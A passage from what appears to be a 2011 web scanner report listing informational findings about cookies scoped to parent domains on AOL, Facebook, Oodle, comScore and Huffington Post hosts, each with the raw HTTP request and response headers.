Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FchangeSettings
Content-Length: 400
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.30. http://aolmobile.aol.com/registration/deleteDevice

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aolmobile.aol.com
Path:   /registration/deleteDevice

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/deleteDevice HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FdeleteDevice
Content-Length: 398
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.31. http://aolmobile.aol.com/registration/generateConfCode

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aolmobile.aol.com
Path:   /registration/generateConfCode

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/generateConfCode HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FgenerateConfCode
Content-Length: 402
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.32. http://aolmobile.aol.com/registration/validateConfirmCode

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aolmobile.aol.com
Path:   /registration/validateConfirmCode

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration/validateConfirmCode HTTP/1.1
Host: aolmobile.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Set-Cookie: RSP_LOCAL_AOLMOBILE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=.aol.com
Set-Cookie: RSP_PORTAL_AOLPORTAL=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/_cqr; domain=.aol.com
Location: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=aolmobile.aol.com&authLev=1&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Faolmobile.aol.com%252Fregistration%252FvalidateConfirmCode
Content-Length: 405
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://my.screenname.aol.com/_cqr/login/login.
...[SNIP]...

16.33. http://apartments.rentedspaces.oodle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: dHJvaQ==
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 10:52:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=9d24efce43dd8cc7953ce4e26ae5ee49; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=10638657d5601f6477e0bfda5c9e7dba; path=/; domain=.oodle.com
Set-Cookie: a=dT1BOEQzNzU3RjREQzI4MTZG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NTkyNzUxO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 182628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...

16.34. http://ar-ar.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar-ar.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: ar-ar.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=yZ_CTXCcbtu4v4v8l1dHFsQR; expires=Sat, 04-May-2013 13:02:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=aCE9U; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Far-ar.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Far-ar.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.103.114
X-Cnection: close
Date: Thu, 05 May 2011 13:02:01 GMT
Content-Length: 17388
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ar" lang="ar" id="facebook" class=
...[SNIP]...

16.35. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304557020.283,wait-%3E10000,&1304575020884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_G=method->-1,ts->1304557018; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

16.36. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p90452457&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:58:51 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90452457=exp=1&initExp=Thu May 5 00:58:51 2011&recExp=Thu May 5 00:58:51 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 00:58:51 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27159

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"310177527",Pid:"p90452457",Arc:"211671722",Location:
...[SNIP]...

16.37. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:58 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:58 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557018; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25569

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...

16.38. http://b.aol.com/vanity/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.aol.com
Path:   /vanity/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304574981812&h=www.aol.com&v=12&t=AOL.com%20-%20News%2C%20Sports%2C%20Weather%2C%20Entertainment%2C%20Local%20%26%20Lifestyle&r=&l=0&k=1&ms=2&dL_ch=us.aolportal&dL_dpt=main5%20AOL.com%205.0%20Main&template=maing-grid7&cobrand=main5&plids=60474%7Cdaily-buzz6%7Ccol2%7C2%2C50380%7Ctrending-stories%7Ccol3%7C5%2C31799%7Csign-in-sign-out%7Cnull%7C3%2C58322%7Cleaveback-pixel%7Ccol3%7C9%2C58669%7Cwelcome-messaging%7Cnull%7C2%2C10696%7Cbrand-6%7Cfooter%7C1%2C51734%7Cfooterlinks%7Cfooter%7C2%2C52762%7Cstock-markets-markets%7Ccol1R%7C3%2C10694%7Cbrand-1%7Cfooter%7C1%2C8834%7Cbrand-7%7Cfooter%7C1%2C60289%7Ctrending-stories-feed%7Ccol3%7C5%2C8838%7Cbrand-8%7Cfooter%7C1%2C60572%7Cdl1%7Cdl-wide%7C1%2C60536%7Ctrending-now%7Ccol3%7C6%2C10820%7Cbrand-3%7Cfooter%7C1%2C59315%7Cdirectory%7Ccol1L%7C1%2C8870%7Cbrand-5%7Cfooter%7C1%2C59113%7Cmore-news-huffpost%7Ccol1R%7C1%2C60539%7Cstandalonevj%7Ccol2%7C1%2C54569%7Cnewsletter2%7Ccol3%7C8%2C51721%7Cprodsvcs%7Ccol1L%7C2%2C60329%7Clocal%7Ccol1R%7C2%2C60544%7Cfollow-me-module%7Ccol3%7C4%2C8826%7Cbrand-2%7Cfooter%7C1%2C59310%7Cmore-news%7Ccol1R%7C1%2C60496%7Cdaily-buzz7%7Ccol2%7C2%2C12684%7Cbrand-4%7Cfooter%7C1%2C51754%7Cqnav-radio%7Cnull%7C7%2C60499%7Cdaily-buzz8%7Ccol2%7C2%2C51753%7Cqnav-aim%7Cnull%7C7%2C8821%7Cbrand-9%7Cfooter%7C1%2C20322%7Cweather%7Cnull%7C4%2C60514%7Cbusiness-news%7Ccol1R%7C4%2C18826%7Centertainment-news%7Ccol1R%7C6%2C60556%7Cdaily-buzz5%7Ccol2%7C2%2C60557%7Cdaily-buzz9%7Ccol2%7C2%2C60558%7Cdaily-buzz1%7Ccol2%7C2%2C60554%7Cdaily-buzz3%7Ccol2%7C2%2C60555%7Cdaily-buzz4%7Ccol2%7C2%2C22965%7Centertainment-news%7Ccol1R%7C6%2C42552%7Clogo%7Cnull%7C5%2C60466%7Cdaily-buzz2%7Ccol2%7C2%2C59525%7Cfeatured-brands%7Cfooter%7C1%2C60560%7Cvideo-feature%7Ccol3%7C7%2C60521%7Csports-news%7Ccol1R%7C5%2C60569%7Cvideo-promo3%7Ccol3%7C7%2C47438%7Cqnav-mail%7Cnull%7C7%2C60567%7Cvideo-promo2%7Ccol3%7C7%2C60566%7Cvideo-promo1%7Ccol3%7C7 HTTP/1.1
Host: b.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B; MUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.be91

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:24 GMT
Server: Apache
Set-Cookie: MUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.be91; expires=Thu, 03-Nov-2011 15:50:47 GMT; path=/; domain=b.aol.com
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; expires=Thu, 03-Nov-2011 15:50:47 GMT; path=/; domain=.aol.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; expires=Thu, 05-May-2011 12:56:24 GMT; path=/; domain=.aol.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 00:56:24 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.39. http://b.dailyfinance.com/vanity/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.dailyfinance.com
Path:   /vanity/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304575093064&h=www.dailyfinance.com&v=10&t=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20Earnings%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance&r=&l=0&k=1&ms=0&dL_ch=us.dailyfin&dL_ste=aoldailyfin%2Caolsvc&UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2 HTTP/1.1
Host: b.dailyfinance.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:42 GMT
Server: Apache
Set-Cookie: UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; expires=Thu, 03-Nov-2011 15:53:05 GMT; path=/; domain=.dailyfinance.com
Set-Cookie: CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; expires=Thu, 05-May-2011 12:58:42 GMT; path=/; domain=.dailyfinance.com
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.40. http://b.huffingtonpost.com/vanity/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.huffingtonpost.com
Path:   /vanity/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1304575139901&h=www.huffingtonpost.com&v=10&t=Breaking%20News%20and%20Opinion%20on%20The%20Huffington%20Post&r=http%3A%2F%2Fwww.aol.com%2F&l=0&k=1&ms=1&dL_ch=us.hpmg&dL_dpt=front&UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903 HTTP/1.1
Host: b.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.5.10.1304575105; s_pers=%20s_getnr%3D1304575139917-New%7C1367647139917%3B%20s_nrgvo%3DNew%7C1367647139919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; 